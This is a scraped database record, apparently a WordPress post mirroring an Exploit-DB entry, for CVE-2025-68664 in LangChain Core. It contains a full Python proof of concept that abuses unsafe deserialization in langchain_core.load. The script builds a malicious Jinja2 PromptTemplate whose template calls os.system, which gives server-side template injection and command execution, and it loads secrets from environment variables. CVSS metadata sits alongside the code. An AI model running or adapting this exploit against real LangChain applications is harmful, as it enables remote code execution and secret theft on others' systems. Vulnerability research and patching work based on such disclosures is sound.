{“lastseen”:”2026-04-29T05:27:57″,”description”:”Exploit Title: LangChain Core – SSTI\/RCE Date: 2025-12-29 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Contact: @banyamersecurity Instagram GitHub: https:\/\/github.com\/mbanyamer Vendor Homepage: https:\/\/www.langchain.com\/ Software…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”LangChain Core 1.2.4 – SSTI\/RCE”,”source”:””,”references”:””,”id”:”EDB-ID:52514″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-68664″],”sourceData”:”# Exploit Title: LangChain Core – SSTI\/RCE \\r\\n# Date: 2025-12-29\\r\\n# Exploit Author: Mohammed Idrees Banyamer\\r\\n# Author Country: Jordan\\r\\n# Contact: @banyamer_security (Instagram)\\r\\n# GitHub: https:\/\/github.com\/mbanyamer\\r\\n# Vendor Homepage: https:\/\/www.langchain.com\/\\r\\n# Software Link: https:\/\/pypi.org\/project\/langchain-core\/\\r\\n# Version: \\u003c 0.3.81 and \\u003c 1.2.5\\r\\n# Tested on: Python 3.10 – 3.12\\r\\n# CVE : CVE-2025-68664\\r\\n# Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate\\r\\n# with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution.\\r\\n\\r\\nimport os\\r\\nfrom langchain_core.load import dumps, load\\r\\nfrom langchain_core.prompts import PromptTemplate\\r\\n\\r\\n# Set a dummy env var (demonstrates potential secret access if needed)\\r\\nos.environ[\\”TEST_SECRET\\”] = \\”secret_value_123\\”\\r\\n\\r\\n# Malicious constructor payload targeting PromptTemplate with SSTI\\r\\npayload = {\\r\\n \\”exploit\\”: {\\r\\n \\”lc\\”: 1,\\r\\n \\”type\\”: \\”constructor\\”,\\r\\n \\”id\\”: [\\”langchain_core\\”, \\”prompts\\”, \\”prompt\\”, \\”PromptTemplate\\”],\\r\\n \\”kwargs\\”: {\\r\\n \\”input_variables\\”: [],\\r\\n \\”template\\”: \\”{{ config.get(‘callbacks’, {}).get(‘__builtins__’, {}).get(‘__import__’, lambda x: __import__(x))(‘os’).system(‘id’) }}\\”,\\r\\n \\”template_format\\”: \\”jinja2\\”\\r\\n }\\r\\n }\\r\\n}\\r\\n\\r\\n# Serialize (dumps does not escape ‘lc’ key)\\r\\nserialized = dumps(payload)\\r\\n\\r\\n# Deserialize – instantiates the malicious PromptTemplate\\r\\ndeserialized = load(serialized, secrets_from_env=True)\\r\\n\\r\\n# Extract and invoke the malicious prompt \u2192 triggers SSTI \u2192 RCE\\r\\nmalicious = deserialized[\\”exploit\\”]\\r\\noutput = malicious.format()\\r\\n\\r\\nprint(\\”[*] Command execution output:\\”)\\r\\nprint(output)”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52514″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52514″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-29T05:27:57″,”description”:”Exploit Title: LangChain Core – SSTI\/RCE Date: 2025-12-29 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Contact: @banyamersecurity Instagram GitHub: https:\/\/github.com\/mbanyamer Vendor Homepage: https:\/\/www.langchain.com\/ Software…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”LangChain…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,40,13,7,11,5],"class_list":["post-50076","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n